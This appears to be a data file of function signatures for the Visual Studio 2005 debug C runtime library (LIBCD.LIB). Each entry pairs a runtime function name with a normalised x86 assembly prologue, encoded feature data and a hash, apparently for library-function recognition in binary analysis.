+__getche,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,-1\nJCC CONST",oDc6oU+LzAoAAAAAeF2amCSjmVzmXBQrJKOZXE+LzAoAAAAAT4vMCgAAAAAAAAAA5lwUKySjmVygNzqhi/ZINU+LzAoAAAAAchMCgHhdmpiL9kg1,[],ecdedcb93d6390e3432b1631de5c61b8e2e0ed54,VS2005,LIBCD.LIB
+__getch,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",qXehlfQp7gichlE4JAPDnSQDw52vJ1dcgpu0IPQp7gichlE4AgXnyk+LzAoAAAAAPuzDGgIF58oAAAAAcv8ZOyQDw53gQ7kBmzkZbzUWchOchlE4rydXXE+LzAoAAAAAQg8+6/Qp7gichlE4XqODJwIF58oAAAAA7HAQGjUWchM+7MMaJAPDnal3oZWCm7QgnIZRODUWchMbofrjT4vMCgAAAAAAAAAAnIZROJs5GW/0Ke4INRZyE0IPPusAAAAAG6H64+xwEBpeo4Mn4EO5AU+LzAoAAAAA9CnuCAIF58oAAAAA,[],7e1a0acdf027f9d6d36330e343eb6edbee9d92b4,VS2005,LIBCD.LIB
+__ungetch,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR SS:[EBP+CONST],-1\nJCC CONST",AOHWawAAAAAAAAAAxJKmaADh1msAAAAAJAPDnXCksaPEkqZocKSxowDh1msAAAAAcMiU5MSSpmgkA8Od,[],62504dc8c9b37c0534561de1d8eac3cc0d7a8302,VS2005,LIBCD.LIB
+__kbhit,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",l3FRnkGOvWAAAAAAZnkxNUGOvWAAAAAAXqODJwc7NkEAAAAA7AJjnibu4WWchlE4Ju7hZUGOvWAAAAAAQY69YAAAAAAAAAAAEIVrfyQDw538xKCqnIZROCbu4WWDrkNeg65DXibu4WVeo4Mn/MSgqkGOvWAAAAAAXqODJ5yGUTgAAAAABzs2QSbu4WXofidMJAPDnSQDw50EgxODBIMTg2Z5MTUDtHwFJAPDnWZ5MTUDtHwFnIZROCbu4WXofidMA7R8BWZ5MTWchlE46H4nTF6jgycp2auwKdmrsF6jgyfdLNxtnIZROGZ5MTUrCaUW3SzcbZdxUZ72GKXzKwmlFuwCY55meTE19hil816jgyeXcVGe,[],8f4a3f0a3c0a195f27b9c32c81f355934c686ff8,VS2005,LIBCD.LIB
+__cwild,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",rydXXE+LzAoAAAAAE+IdH5yGUTgAAAAAdyUeNXMZatSvJ1dccxlq1JyGUTgAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAXqODJzUWchMAAAAALz7DNTUWchOvJ1dcduUUZhPiHR+IpSMIiKUjCJEkTvIvPsM1rydXXE+LzAoAAAAAPsqG2XblFGYAAAAATSgDSZyGUTgAAAAArydXXE+LzAoAAAAANRZyEz7KhtkAAAAAnIZROAYbIwWTNuOpkzbjqU0oA0kAAAAALz7DNV6jgyevJ1dcPQDoy5yGUTgAAAAABhsjBZyGUTgAAAAAnIZROHclHjVeo4MnkSRO8i8+wzWLLp4gXqODJz0A6MsAAAAAXqODJzUWchMAAAAAFFxEfXblFGYAAAAA3XDeWybu4WWxvFp8nIZROCbu4WWxvFp8sbxafN1w3lsAAAAAiy6eIF6jgyevJ1dcrydXXE+LzAoAAAAA,[],03e10edfd30ebb27a5417f194544b0c8a5fe367f,VS2005,LIBCD.LIB
+__mbstrlen,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",JAPDneRSvJ+S9NEBpBdjb0FF0Btyxn5e/iJHfMSg0gkAAAAAbyT/I/Qp7gjEkqZo9CnuCKQXY28AAAAAdYMGryQDw50kA8Od5FK8nyQDw50kA8OdkvTRAeRSvJ91gwavcsZ+Xl6jgycahBx2GoQcdl6jgydeo4MnJAPDnW8k/yP+Ikd8gudAo6QXY28AAAAAXqODJ4LnQKMAAAAAQHnxvuRSvJ8kA8OdxJKmaMSg0gkAAAAAJAPDneRSvJ8kA8OdXqODJ0FF0BsAAAAAxKDSCQAAAAAAAAAAQUXQG8Sg0gkAAAAA,[],0972c0c07e7ea02c328f68adab925203360579f9,VS2005,LIBCD.LIB
+_swprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",kvTRAeRSvJ87j6vljNC7eqe0XCQAAAAAp7RcJIzQu3qYvk8JnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4uz1JhQAAAAAAAAAAkvTRAeRSvJ87j6vlFnKdaKe0XCQAAAAAnIZROORSvJ+S9NEBS3YbfJyGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTikluVCjNC7ers9SYUAAAAAmL5PCbs9SYUAAAAApJblQozQu3oWcp1o,[],d8cdda3cfc33ce4baad481507d0fe85181815e48,VS2005,LIBCD.LIB
+__mbccpy,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R8,BYTE PTR DS:[R32]\nMOV BYTE PTR DS:[R32],R8\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32",AOHWawAAAAAAAAAAazC8LADh1mszJvfJMyb3yQDh1msAAAAA,[],30fe55e8ec2f27fbbf9a0fbdaee375c8e20f6d2b,VS2005,LIBCD.LIB
+_wcscspn,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD CONST,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nTEST R32,R32\nJCC CONST",cb9QwchSX9fpbmZt555ci4TH21hxWpQ6T4vMCgAAAAAAAAAAISBBJchSX9fpbmZtISBBJYTH21hxWpQ6XqODJ3G/UMEAAAAA6W5mbV6jgyc+qYZfPqmGX0+LzAoAAAAAyFJf1yEgQSUAAAAAcVqUOiEgQSUAAAAAhMfbWE+LzAoAAAAA,[],b88a32b3d8409584fccaf03640b915892af29712,VS2005,LIBCD.LIB
+__fdopen,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",P2HSMJ+cHzzBm6AuJw91EqiUbbMnD3USJw91EqiUbbNeo4Mnt5wE4+RSvJ+S9NEBkvTRAeRSvJ91gwavXqODJ5+cHzwAAAAAqJRts1kvl4oAAAAAnIZROORSvJ+S9NEBwZugLgAAAAAAAAAAkvTRAeRSvJ91gwavqJRts1kvl4oAAAAAdYMGrwZiiMPuiKz+5FK8nwZiiMPuiKz+7ois/mZ5MTUGYojDWS+Xiv4HIhtpzQYAdYMGr5yGUTjuiKz+5FK8n5yGUTjuiKz+BmKIw3hdmphmeTE1uz1JhQAAAAAAAAAA7ois/uRSvJ+S9NEBn5wfPO/PS04AAAAA/gciGwAAAAAAAAAAZnkxNcSg0gkAAAAA789LTv4HIhtpzQYAeF2amI72Kp9meTE1kvTRAeRSvJ91gwavdYMGr+6IrP4GYojD5FK8n+6IrP4GYojDn5wfPLs9SYUAAAAABmKIw+RSvJ+S9NEBZnkxNcSg0gkAAAAAxKDSCQAAAAAAAAAAac0GAP4HIhs/YdIwjvYqn6iUbbMnD3US,[],adb5e22edbb443a7382988a5be20e26073458cbb,VS2005,LIBCD.LIB
+_swscanf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",O4+r5eRSvJ8AAAAA5FK8n5yGUThgMLnykvTRAeRSvJ87j6vlYDC58gAAAAAAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4kvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBS3YbfJyGUTgAAAAA,[],3360512cba40d36ca088fccc3062ce45e04b9553,VS2005,LIBCD.LIB
+__snwprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",O4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4kvTRAeRSvJ87j6vluz1JhQAAAAAAAAAAFnKdaKe0XCQAAAAAnIZROORSvJ+S9NEBS3YbfJyGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTjY8ci7FnKdaLs9SYUAAAAAkvTRAeRSvJ87j6vl2PHIuz3zoAwWcp1ojNC7ers9SYUAAAAAPfOgDIzQu3oWcp1op7RcJIzQu3oWcp1onIZROORSvJ+S9NEB,[],fd3b9de4fd33b7e63bc5d46335fec946b0fbaf8f,VS2005,LIBCD.LIB
+_fputwc,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",nIZROKe0XCSntFwkp7RcJOlwu4VLf0gHKdmrsJSWRFydWiLm8om3zj6eGjSVFn78xbOaZpyGUTgAAAAAT4vMCgAAAAAAAAAAnVoi5s2seN8AAAAAS39IB5yGUTgAAAAAnIZROD6eGjSVFn78lRZ+/E+LzAoAAAAAPp4aNE+LzAoAAAAA8om3zpUWfvyntFwklJZEXKe0XCS0cKtsp7RcJLB3QNWxGY/Xzax436e0XCS0cKts6XC7hZyGUTgAAAAAnIZROJUWfvyntFwkp7RcJPKJt85Lf0gHtHCrbJyGUTim1GmVsRmP10+LzAoAAAAAnIZROFUr6wD+o4/I/qOPyE+LzAoAAAAAVSvrAE+LzAoAAAAAS39IB5yGUTgAAAAAptRplU+LzAoAAAAAS5ltOKe0XCQp2auwp7RcJPKJt87Fs5pmsHdA1U+LzAoAAAAA,[],63338a6038e37e7d7f2599bf50937120de8ab8e9,VS2005,LIBCD.LIB
+_putwc,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R16,WORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",f1i6WwAAAAAAAAAA,Pp4aNE+LzAoAAAAA8om3zpUWfvyntFwklJZEXKe0XCS0cKtsp7RcJLB3QNWxGY/Xzax436e0XCS0cKts8om3zlUr6wD+o4/InIZROJUWfvyntFwkp7RcJPKJt85Lf0gHtHCrbJyGUTim1GmVsRmP10+LzAoAAAAAnIZROFUr6wD+o4/I/qOPyE+LzAoAAAAAVSvrAE+LzAoAAAAAS39IB5yGUTgAAAAAptRplU+LzAoAAAAAS5ltOKe0XCQp2auwp7RcJPKJt87Fs5pmsHdA1U+LzAoAAAAAnIZROKe0XCSntFwkp7RcJPKJt85Lf0gHKdmrsJSWRFydWiLm8om3zj6eGjSVFn78xbOaZpyGUTgAAAAAT4vMCgAAAAAAAAAAnVoi5s2seN8AAAAAS39IB5yGUTgAAAAAnIZROD6eGjSVFn78lRZ+/E+LzAoAAAAA,0192a5b3146339316d1733a7c99a9ac460370c2a,VS2005,LIBCD.LIB
+__heapchk,"MOV DWORD PTR SS:[EBP+CONST],+CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",qJmLmtUc1LYAAAAAJXfeSdUc1LYC6H/0ho8+vCV33kmthmhxAuh/9JZz8F+omYualnPwX9Uc1LYAAAAArYZocdUc1LYC6H/01RzUtgAAAAAAAAAA,[],c349ac542283d4abeb0acf861b39251146ab429d,VS2005,LIBCD.LIB
+__heapset,"PUSH EBP\nMOV EBP,ESP\nCALL CONST\nPOP EBP\nRETN",8aGSbwAAAAAAAAAA,rYZocdUc1LYC6H/01RzUtgAAAAAAAAAAqJmLmtUc1LYAAAAAJXfeSdUc1LYC6H/0ho8+vCV33kmthmhxAuh/9JZz8F+omYualnPwX9Uc1LYAAAAA,bd4cedeae827845c98575cbef5808863d461a96d,VS2005,LIBCD.LIB
+__allrem,"DIV R32\nMOV R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nXCHG R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nADD R32,R32\nJCC CONST",OaywaTqkpDSchlE4VKtyQuF2XKBeo4MnXqODJ7YU/3IAAAAA+xbteYJLXxQ5rLBpcug6RfsW7XlUq3JCkf0uQhY4CCJluNrO3ifW3rYU/3LhdlygFjgIInLoOkVNBymNnIZRODqkpDQhh3lj4XZcoLYU/3IAAAAAgktfFIJLXxQ5rLBpIYd5Y94n1t6chlE4ZbjaznLoOkVNBymNthT/cgAAAAAAAAAATQcpjfsW7XlUq3JCnIZRON4n1t46pKQ0OqSkNN4n1t4AAAAA,[],96bca5c1d60dae1b5f6a6147370eb68f241a4e35,VS2005,LIBCD.LIB
+_fsetpos,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nMOV R32,DWORD PTR DS:[R32]\nPUSH R32",JzQLEAAAAAAAAAAA,cAHBCTHpBKATMfSvO4+r5eRSvJ8AAAAA5FK8n5yGUThi2SnJ9CnuCEFF0BsAAAAAYtkpyR4YujmchlE4lnPwX0FF0BsAAAAAEzH0rydrVYEAAAAAxKDSCQAAAAAAAAAAnIZROFCpBaGchlE4nIZROFCpBaGchlE4MekEoCdrVYEx6QSgQUXQG8Sg0gkAAAAAnIZROFCpBaEeGLo5Hhi6OcSg0gkAAAAAMekEoCdrVYHke5wD5HucAydrVYFo50nZUKkFoXABwQko1MqSaOdJ2SdrVYEAAAAAma5ZK5yGUTgAAAAAKNTKknABwQkAAAAAJ2tVgZZz8F/0Ke4InIZROORSvJ+S9NEBkvTRAeRSvJ87j6vl,4dc536327f5bc7f0fc998b3da97cf3648991c926,VS2005,LIBCD.LIB
+__getbuf,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",a11M0+RSvJ+S9NEB4s35udOW3cQAAAAA8bu7dNOW3cQAAAAAnIZROORSvJ+S9NEBdYMGr5yGUTiit79n5FK8n5yGUTiit79nkvTRAeRSvJ91gwavore/Z/G7u3Tizfm505bdxAAAAAAAAAAA,[],14e265772921802275b4c739d8e4a8fb0e7dde82,VS2005,LIBCD.LIB
+___get_qualified_locale,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",DczAAU+LzAoAAAAAN9QtU16jgycAAAAAIAdaKSqzQt4AAAAAZnkxNU+LzAoAAAAAXqODJyQDw50AAAAAJAPDnQSDE4OyrHRpdpz9mr20L8kAAAAAW9OYkZyGUTgAAAAAn8ANxJU8LviyrHRpsqx0aQSDE4M31C1TKrNC3k+LzAoAAAAABYNfnjMQKP4NzMABsqx0aZU8Lvib5Re4T4vMCgAAAAAAAAAAEIVrf5yGUThSaOpbN9QtUyQDw50AAAAAZoBNEZU8LviyrHRpBIMTgx1K1MRmeTE1JAPDnR1K1MRmeTE1UmjqW/qDfp92nP2am+UXuCQDw51Giv0EZnkxNU+LzAoAAAAAnIZROCqzQt4Fg1+eDczAAU+LzAoAAAAAHUrUxGZ5MTUrg0tk+oN+n0htW9FcYdxnN9QtUyQDw50AAAAAlTwu+CQDw51Giv0ERor9BDfULVM31C1TnIZROEhtW9FcYdxnXGHcZyQDw50AAAAAK4NLZGOej1BmeTE1vbQvyUhtW9FcYdxnRor9BCQDw50kA8OdMxAo/iAHWikNzMABSG1b0Z/ADcSyrHRpJAPDnTfULVNGiv0EZnkxNU+LzAoAAAAAnIZROJyGUThb05iRY56PUJyGUThmeTE1sqx0aZ/ADcRmgE0R,[],b6cd479351df6b4f9c98d177a4ca10778a1ffc92,VS2005,LIBCD.LIB
+__wrename,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",mXjub0+LzAoAAAAAbGYbnJyGUTgAAAAAJu7hZU+LzAoAAAAAMsCQgpZz8F9sZhuclnPwX5yGUTgAAAAAnIZROCbu4WWZeO5vT4vMCgAAAAAAAAAA,[],8e2fc6ec78948691cab68e4fb3eb464feca61046,VS2005,LIBCD.LIB
+___init_time,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",LwJyQt4YyhUP0nfQh1hVuBmR0Yk6WzCRGZHRiU+LzAoAAAAAD9J30E+LzAoAAAAA3hjKFU+LzAoAAAAAOlswkS8CckL8xKCq/MSgqk+LzAoAAAAAT4vMCgAAAAAAAAAA,[],a256245b6672f4ed8777a206458f5948c4e0a7ff,VS2005,LIBCD.LIB
+__fpmath,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nCALL CONST\nMOV DWORD PTR DS:[0],R32",glm4pgAAAAAAAAAA,Fiu3iAAAAAAAAAAA,73f963ed906a573dfd29032a8b592d0f4ec972fb,VS2005,LIBCD.LIB
+__cfltcvt_init,"PUSH EBP\nMOV EBP,ESP\nMOV DWORD PTR DS:[0],0\nMOV DWORD PTR DS:[CONST],0\nMOV DWORD PTR DS:[CONST],0\nMOV DWORD PTR DS:[CONST],0\nMOV DWORD PTR DS:[CONST],0\nMOV DWORD PTR DS:[CONST],0",Fiu3iAAAAAAAAAAA,[],b788ce9aa42b708d6f7a872ffd5e9be44d690c2e,VS2005,LIBCD.LIB
+__fpclear,"PUSH EBP\nMOV EBP,ESP\nPOP EBP\nRETN",LsKVeAAAAAAAAAAA,[],74c0a4a369862bf2e97882aee90ce15a67e5d832,VS2005,LIBCD.LIB
+___setfflag,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[0],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",sAsYHAAAAAAAAAAA,[],2c7df1dc9055df7b5e996e1e2252f92905124a28,VS2005,LIBCD.LIB
+__putws,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nTEST R32,R32",7xfqreRSvJ+S9NEBl+cral6jgydeo4MnxIyCpwAAAAAAAAAAXqODJ10W4SoAAAAAXqODJyEgQSUAAAAAISBBJVrvjHmX5ytqWu+MeV0W4SrEjIKnXRbhKgAAAAAAAAAAnIZROORSvJ+S9NEBdYMGr5yGUThdI5ly5FK8n5yGUThdI5lykvTRAeRSvJ91gwavXSOZclrvjHmX5ytq,[],a1941942790c554da2219a0be3a6057ab4a7f186,VS2005,LIBCD.LIB
+__isctype,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nCMP R32,CONST\nJCC CONST",9BIeVNQqgRkNzMAB1CqBGU+LzAoAAAAAF5iDq7JJc1U7hZT8O4WU/PQSHlQAAAAAsklzVfQSHlQAAAAA5GzHVU+LzAoAAAAADczAAU+LzAoAAAAAT4vMCgAAAAAAAAAAPBdLmReYg6vkbMdV,[],f704ede723df1915fcc0b93a145d65bc5e1fb6cd,VS2005,LIBCD.LIB
+??2@YAPAXIHPBDH@Z,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",1I8kHwAAAAAAAAAA,oDc6oU+LzAoAAAAALwJyQl6jgycNzMABXqODJ97g538AAAAADczAAU+LzAoAAAAALtQI0t7g538AAAAA3uDnf6A3OqGchlE4nIZROC8CckKgNzqhT4vMCgAAAAAAAAAA,0df397481945dbe3933272eb7fc51de7f010e40a,VS2005,LIBCD.LIB
+__eof,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",9CnuCNUc1LYAAAAA7bLtN4MRrFwGYojDcDCovYOuQ170Ke4Ig65DXpFZvZ/0Ke4IT4vMCgAAAAAAAAAAcDCovfQp7ghwMKi99CnuCNUc1LYAAAAA1RzUtgAAAAAAAAAAgxGsXE+LzAoAAAAABmKIw3AwqL2DEaxckVm9nwAAAAAAAAAA,[],2483941672df9a154baa847434e3287df51e5703,VS2005,LIBCD.LIB
+__wgetpath,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV WORD PTR DS:[R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP",6H4nTD7KhtlSPH0SUjx9El6jgyca72UOcVqUOlO5nfUAAAAAXqODJyEgQSUAAAAAISBBJTUWchM+yobZLtQI0uh+J0wAAAAAPsqG2TUWchMAAAAA6H4nTJ0cG6vIUl/XXqODJzUWchMAAAAANRZyE9RrFh0AAAAAGu9lDlO5nfUAAAAAyFJf1+h+J0wAAAAAnRwbq9RrFh01FnITyFJf1+h+J0wAAAAAPsqG2SEgQSUAAAAAISBBJSEgQSXofidMU7md9QAAAAAAAAAANRZyE1O5nfUAAAAA6H4nTCEgQSVSPH0S1GsWHeh+J0wdNXB0Ujx9El6jgydxWpQ66H4nTFO5nfXIUl/XHTVwdOh+J0zofidM,[],ea14c8de2be0f355e555a11235cc69746dcd6ef9,VS2005,LIBCD.LIB
+__rmtmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV R32,DWORD PTR DS:[R32+R32*4]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",XqODJ1KlaoQAAAAA9sveK16jgycAAAAAUqVqhNUc1LZNJfkBG3yOHl6jgyf2y94r7ois/tUc1LZNJfkBotU0ru6IrP4AAAAA1RzUtgAAAAAAAAAATSX5AV6jgycbfI4e,[],63ac0b02c1cee59965db24da31f8ff4715961a2d,VS2005,LIBCD.LIB
+___init_collate,"PUSH EBP\nMOV EBP,ESP\nXOR R32,R32\nPOP EBP\nRETN",F0UAEQAAAAAAAAAA,[],a737d8b8f0a0c3ab192f3887d4e523ede59957cb,VS2005,LIBCD.LIB
+__swab,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",nIZROE+LzArXyqLbVaatKE+LzArXyqLbT4vMCgAAAAAAAAAA18qi25yGUTgAAAAA,[],e5fb4445962689a4addc3c4a856a3d2faa42e287,VS2005,LIBCD.LIB
+__setsystime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",lVAczE+LzAoAAAAAT4vMCgAAAAAAAAAAf2lMFSbu4WWVUBzMJu7hZU+LzAoAAAAA,[],13e1c657b418c8074eb6bbb5c0daa1ddedf6b51f,VS2005,LIBCD.LIB
+__getsystime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32+CONST],-1",RuxvUgAAAAAAAAAA,[],cd9223b0db544f2534fbdc034f5f7ec8bab3387e,VS2005,LIBCD.LIB
+__mbctohira,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",iw0UTNiy05mLDRRMiw0UTOFsJcGsTwie4Wwlwdiy05kAAAAA2LLTmQAAAAAAAAAAZwXcJdiy05mLDRRMrE8Intiy05kAAAAA,[],cb46f9e3af887c20969768ecec4c11193bdc3cd6,VS2005,LIBCD.LIB
+__wsplitpath,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nSHR R32,CONST\nCMP R32,CONST\nJCC CONST",XqODJ0+LzAoAAAAAFCR0vyEgQSUAAAAAnIZROJyGUTiexIbplnPwX2mu10sAAAAAnsSG6ZZz8F+jOITKaa7XS5yGUTgAAAAAJx7cYGnNBgAAAAAAPsqG2SEgQSUAAAAAB/gElJyGUTjJ5tj/6H4nTMhSX9fofidMoziEymmu10sAAAAAISBBJZyGUTjofidMlnPwX2mu10sAAAAAaa7XS5yGUTgAAAAAnIZROF6jgycuSwUJ6H4nTOh+J0zIUl/XcVqUOmnNBgAAAAAALksFCZZz8F+jOITKyebY/5yGUTichlE4nIZROGnNBgACHF8VyFJf116jgycAAAAAAhxfFWnNBgAAAAAAlnPwXyce3GAAAAAAoziEygAAAAAAAAAAnIZROMhSX9eIe4iO6H4nTF6jgyf4d/nBac0GAJyGUTh25RRmiHuIjshSX9cAAAAAnIZROE+LzAoCHF8VlnPwXwAAAAAAAAAAduUUZpyGUTichlE4+Hf5wV6jgycAAAAAAhxfFU+LzAoAAAAAXqODJz7KhtkAAAAAnIZROJyGUTichlE4T4vMCgAAAAAAAAAAnIZROJyGUTiexIbpnIZROHFalDqexIbpnsSG6ZZz8F+jOITKyFJf1xQkdL8AAAAAnsSG6ZZz8F+jOITKnIZROBQkdL8CHF8VoziEymmu10sAAAAAAhxfFRQkdL8AAAAAoziEyice3GAAAAAA,[],6a73fd4e12515cc1f8179dafba9499c2fec0bbf8,VS2005,LIBCD.LIB
+__ismbstrail,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",4dkFeSbu4WV33LbYCZfunOHZBXnEkqZoDczAAQDh1msAAAAAyFJf14OuQ14AAAAAOWijNIOuQ14NzMABd9y22MhSX9cJl+6cJu7hZQDh1msAAAAAxJKmaADh1msAAAAAAOHWawAAAAAAAAAADczAAQDh1msAAAAA4dkFechSX9cNzMABg65DXibu4WXh2QV5,[],e4c1952bc18c6c6bcd8019e083d20d64d0420a3c,VS2005,LIBCD.LIB
+_fabs,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCHS\nJMP SHORT CONST",RDGKLU+LzAoAAAAA7st6/k+LzAoAAAAAnIZROGa/lCqchlE4T4vMCgAAAAAAAAAAZr+UKk+LzAoAAAAAnIZROEQxii1eo4Mn3iSCKe1+KduchlE4XqODJyLy+gAAAAAA7X4p20+LzAoAAAAAIvL6AE+LzAoAAAAAZopx2O7Lev7eJIIp,[],9eaacd640847cf5d7f9434e51560e5ddf57a88df,VS2005,LIBCD.LIB
+__ftol,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-0C\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nWAIT\nMOV R16,WORD PTR SS:[EBP+CONST]\nOR R8,CONST",FHMPFAAAAAAAAAAA,[],cf99dbeced12f842a0bb6cc431da936d5ba007a1,VS2005,LIBCD.LIB
+_rename,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",Ju7hZU+LzAoAAAAAMsCQgpZz8F9sZhuclnPwX5yGUTgAAAAAnIZROCbu4WWZeO5vmXjub0+LzAoAAAAAT4vMCgAAAAAAAAAAbGYbnJyGUTgAAAAA,[],8e2fc6ec78948691cab68e4fb3eb464feca61046,VS2005,LIBCD.LIB
